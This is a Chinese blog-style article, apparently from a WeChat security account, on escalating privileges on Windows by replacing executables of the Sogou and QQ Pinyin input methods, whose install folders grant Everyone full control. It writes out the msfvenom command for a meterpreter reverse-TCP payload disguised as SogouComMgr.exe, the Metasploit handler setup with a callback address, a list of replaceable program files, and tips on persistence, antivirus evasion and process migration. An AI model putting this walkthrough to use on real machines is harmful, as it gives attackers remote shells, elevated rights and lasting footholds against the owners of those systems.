利用QQ和搜狗输入法进行提权
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言搜狗拼音输入法是目前国内使用人数最多的一款,但仍然会存在一些安全问题,在安装过程中默认给了Everyone完全控制权限,Everyone为所有用户,也就是说我们可以对搜狗拼音输入法安装目录下的任何文件进行修改/删除和写入,所以能达到我们权限提升的目的。虽然这种提权方式有些年头了,但不知道为什么搜狗一直没有修复这个问题。0x02 测试环境操作系统:Windows Server 2016 Datacenter软件版本:搜狗拼音输入法 9.5.0.3517、QQ拼音输入法6.4.5804.400搜狗拼音默认安装路径:C:\Program Files (x86)\SogouInput\QQ拼音默认安装路径:C:\Program Files (x86)\Tencent\QQPinyin\搜狗、QQ输入法进程名:SGTool.exe、SGDownload.exe、pinyinup.exe、SogouCloud.exe、SogouComMgr.exe、SGRender.exe、QQPYUserCenter.exe、QQPYLiveUp.exe、QQPYConfig.exe、QQPYToolbox.exe、QQPYCloud.exe......
0x03 搜狗拼音输入法使用tasklist /svc命令查看搜狗相关进程,或者直接跳转到%ProgramFiles(x86)%目录下看是否安装的有搜狗输入法。
接着再用icacls命令查看搜狗输入法安装目录C:\Program Files (x86)\SogouInput\9.5.0.3517\的权限配置。
官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753525(v=ws.11)
确定搜狗输入法安装目录具备Everyone完全控制权限后就可以生成MSF攻击载荷并设置好相关参数执行监听,然后替换目标机器常用的搜狗相关文件,等管理员使用搜狗输入法时运行到我们替换的文件即可得到会话。root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.120 lport=443 -f exe > /var/www/html/SogouComMgr.exemsf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.0.120msf5 exploit(multi/handler) > set lport 443msf5 exploit(multi/handler) > set autorunscript post/windows/manage/migrate NAME=notepad.exemsf5 exploit(multi/handler) > exploit其它搜狗拼音输入法可替换文件:搜狗输入法 - 属性设置工具:%ProgramFiles(x86)%\SogouInput\9.5.0.3517\SGTool.exe 搜狗输入法 - 修复更新工具:%ProgramFiles(x86)%\SogouInput\9.5.0.3517\SGDownload.exe搜狗输入法 - 网络更新程序:%ProgramFiles(x86)%\SogouInput\9.5.0.3517\pinyinup.exe搜狗输入法 - 云计算代理:%ProgramFiles(x86)%\SogouInput\9.5.0.3517\SogouCloud.exe搜狗输入法 - 云计算代理:%ProgramFiles(x86)%\SogouInput\9.5.0.3517\SearchCand.dll搜狗输入法 - 工具箱:%ProgramFiles(x86)%\SogouInput\Components\SogouComMgr.exe搜狗输入法 - 用户登录:%ProgramFiles(x86)%\SogouInput\Components\SGRender\1.0.0.56\SGRender.exe
0x04 搜狗拼音输入法QQ拼音个人中心QQPYUserCenter.exe被我们替换后直接切换到QQ拼音输入法即可得到Meterpreter会话,其它文件可能还得等管理员执行相应操作后才能得到会话。QQ拼音输入法 - 个人中心:%ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYUserCenter.exeQQ拼音输入法 - 升级工具:%ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYLiveUp.exeQQ拼音输入法 - 属性设置:%ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYConfig.exeQQ拼音输入法 - 工具箱:%ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYToolbox.exeQQ拼音云输入 - 客户端:%ProgramFiles(x86)%\Tencent\QQPinyin\6.4.5804.400\QQPYCloud.exe
0x05 注意事项如果目标机器为XP、2003系统的话我们就可以直接利用lpk.dll劫持来进行权限提升可能会更好;替换文件前要先备份好我们要替换的搜狗拼音输入法相关文件,便于我们后期将其恢复到原始状态;最终获取的Meterpreter会话权限取决于目标服务器登录的是哪个用户来执行我们的搜狗拼音输入法;同时也可以利用目标机器上的搜狗、QQ等输入法来进行权限维持,有安全防护还得自己做下免杀处理;防止替换后的文件在运行后就退出而导致Meterpreter会话断开,笔者建议用migrate模块注入到其它进程中运行;